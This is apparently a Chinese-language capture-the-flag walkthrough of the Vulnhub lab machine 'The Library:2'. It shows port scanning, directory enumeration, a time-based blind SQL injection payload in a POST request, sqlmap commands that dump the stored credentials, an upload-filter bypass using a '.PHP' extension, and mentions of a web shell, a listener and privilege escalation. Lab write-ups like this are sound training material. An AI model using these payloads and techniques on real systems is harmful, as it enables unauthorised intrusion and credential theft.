The Library:2 Vulnhub Walkthrough

主机层面扫描探测:

╰─ nmap -p1-65535 -sV -A 10.10.202.132

Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-20 09:10 CST
Nmap scan report for 10.10.202.132
Host is up (0.00087s latency).
Not shown: 55531 filtered ports, 10002 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 00:0C:29:07:37:5D (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11
Network Distance: 1 hop
Service Info: OS: Unix

 

web目录枚举

╰─ dirb http://10.10.202.132 -X.php

---- Scanning URL: http://10.10.202.132/ ----
+ http://10.10.202.132/library.php (CODE:200|SIZE:1546)

http://10.10.202.132/library.php

The Library:2 Vulnhub Walkthrough_第1张图片

http://10.10.202.132/library.php?country=Netherlands #true

http://10.10.202.132/library.php?country=Netherlands' #false

验证是否存在注入漏洞

经过尝试,需要更改HTTP的请求方式为:POST

POST /library.php HTTP/1.1
Host: 10.10.202.132
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=sklv0krnnccv6ugcvp568fdqo7
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 62

country=England' and if(substr(@@version,1,1)=5,sleep(5),1)--+

The Library:2 Vulnhub Walkthrough_第2张图片

The Library:2 Vulnhub Walkthrough_第3张图片

 

复制到文本文件,使用SQLmap 进行注入

╰─ sqlmap -r target.txt --risk 3 --level 5 --batch

The Library:2 Vulnhub Walkthrough_第4张图片

╰─ sqlmap -r target.txt --risk 3 --level 5 --batch --tables -D library -T access -C password,service,username --dump

The Library:2 Vulnhub Walkthrough_第5张图片

AroundTheWorld | ftp     | globus

The Library:2 Vulnhub Walkthrough_第6张图片

上传php后缀无法上传,更改后缀为PHP,成功绕过上传限制

The Library:2 Vulnhub Walkthrough_第7张图片

The Library:2 Vulnhub Walkthrough_第8张图片

http://10.10.202.132/shell.PHP 

本地监听

The Library:2 Vulnhub Walkthrough_第9张图片

 

进行提权操作

The Library:2 Vulnhub Walkthrough_第10张图片

完!

你可能感兴趣的:(The Library:2 Vulnhub Walkthrough)